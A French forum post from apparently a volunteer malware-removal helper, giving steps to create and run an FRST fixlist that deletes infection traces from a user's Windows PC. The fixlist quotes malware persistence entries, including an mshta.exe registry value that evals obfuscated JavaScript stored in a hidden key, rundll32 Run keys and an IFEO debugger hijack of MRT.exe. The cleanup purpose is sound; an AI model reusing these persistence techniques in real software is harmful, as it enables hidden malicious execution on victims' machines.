Merci d'appliquer ce qui suit.
==> FRST Correction :
- Appuyer sur les touches du clavier Windows et r.
- Dans la fenêtre, écrire: notepad (voir image ci-dessous).
- Cliquer sur OK.
- Copier maintenant toutes les lignes en gras ci-dessous:
Note: pour copier toutes les lignes, griser de haut en bas toutes les lignes en restant appuyer sur le
clic gauche de la souris. Puis faire un clic droit de la souris et choisir Copier.
CloseProcesses:
CreateRestorePoint:
Task: {16779FA5-1059-4DFB-BAC3-E1CB27E7BD11} - System32\Tasks\Gretertychlerent Center => C:\Program Files (x86)\Ckusitrafety\necity.exe
file: C:\Program Files (x86)\Ckusitrafety\necity.exe
C:\Program Files (x86)\Ckusitrafety
Task: {52C740F1-4AF1-42F2-AC6B-4FE1FF0B07FD} - System32\Tasks\{21A5DB5D-964B-463B-815F-8C0B46F5CCA0} => pcalua.exe -a "E:\Torrents\112db Plugins Pack 2015 + Morgana REPACK-R2R (Win)\112db.Morgana.v1.2.7.WIN.OSX.Incl.Keygen.REPACK-R2R\112db.Morgana.v1.2.7.WIN.OSX.Incl.Keygen.REPACK-R2R\Morgana-1.2.7.exe" -d "E:\Torrents\112db Plugins Pack 2015 + Morgana REPACK-R2R (Win)\112db.Morgana.v1.2.7.WIN.OSX.Incl.Keygen.RE (l'élément de données a 61 caractères en plus).
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\26348685.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\26348685.sys => ""="Driver"
HKU\.DEFAULT\Software\Classes\4b20775: "C:\WINDOWS\system32\mshta.exe" "javascript:MOSnwEM7="GwM2R";u2f=new ActiveXObject("WScript.Shell" );r0lQju2="1";W7AFx7=u2f.RegRead("HKCU\\software\\vqwzdwqdv\\jkjkrrefj" );zodV9ygj="bq2Cwjz";eval(W7AFx7);cYa0AHE5F="nE";"
HKU\S-1-5-18\...\Run: [teklon] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\teklon.dll",teklon <===== ATTENTION
file: C:\WINDOWS\system32\config\systemprofile\AppData\Local\teklon.dll
HKU\S-1-5-18\...\Run: [teklum] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\teklum.dll",teklum <===== ATTENTION
HKU\S-1-5-18\...\Run: [dfrang] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\dfrang.dll",dfrang <===== ATTENTION
HKU\S-1-5-18\...\Run: [onikfl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\onikfl.dll",onikfl <===== ATTENTION
HKU\S-1-5-18\...\Run: [buuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\buuigl.dll",buuigl <===== ATTENTION
IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Ckusitrafety\_ALLOWDEL_a25403d\Gubed.exe -Yrrehs
file: C:\Program Files (x86)\Ckusitrafety\_ALLOWDEL_a25403d\Gubed.exe
FF SearchPlugin: C:\Users\Gerald\AppData\Roaming\Firefox\Firefox\Profiles\ggpupmwm.default\searchplugins\searchinme.xml
R2 WinSAPSvc; C:\ProgramData\WinSAPSvc\WinSAP.dll
2016-11-28 13:57 - 2016-11-28 13:57 - 00000000 ____D C:\ProgramData\WinSAPSvc
2016-11-28 13:56 - 2016-11-28 13:56 - 00000000 ____D C:\Program Files (x86)\2obfd6a7
2016-11-22 19:45 - 2016-11-22 19:45 - 00000000 ____D C:\Program Files\kdoag
2016-11-21 03:55 - 2016-11-26 12:43 - 00000000 ____D C:\Program Files (x86)\Wepkthogetain
2016-11-18 13:56 - 2016-08-18 15:36 - 00000000 ____D C:\temp
file: C:\WINDOWS\system32\drivers\azmixfwr.sys
- Retourner dans le bloc-notes ouvert et au milieu de la page, faire un clic de la souris et choisir Coller (toutes les lignes vont s'inscrire).
- Dans l'entête du bloc-notes, cliquer sur Fichier, puis Enregistrer sous ... et selectionner Bureau.
Dans la case Nom du fichier, écrire fixlist et cliquer sur Enregistrer.
- Puis, à partir du Bureau, faire un clic droit de la souris sur l'icône de FRST ou FRST64 et choisir "Exécuter en tant qu'administrateur".
Note : Patienter le temps de la suppression. Le PC va redémarrer.
- Une fois le PC redémarré, un rapport Fixlog.txt a été créé sur le Bureau.
- Héberger ce rapport sur www.Cjoint.com, puis copier/coller le lien fourni dans ta prochaine réponse sur le forum.
Message édité par monk521 le 01-12-2016 à 15:30:50
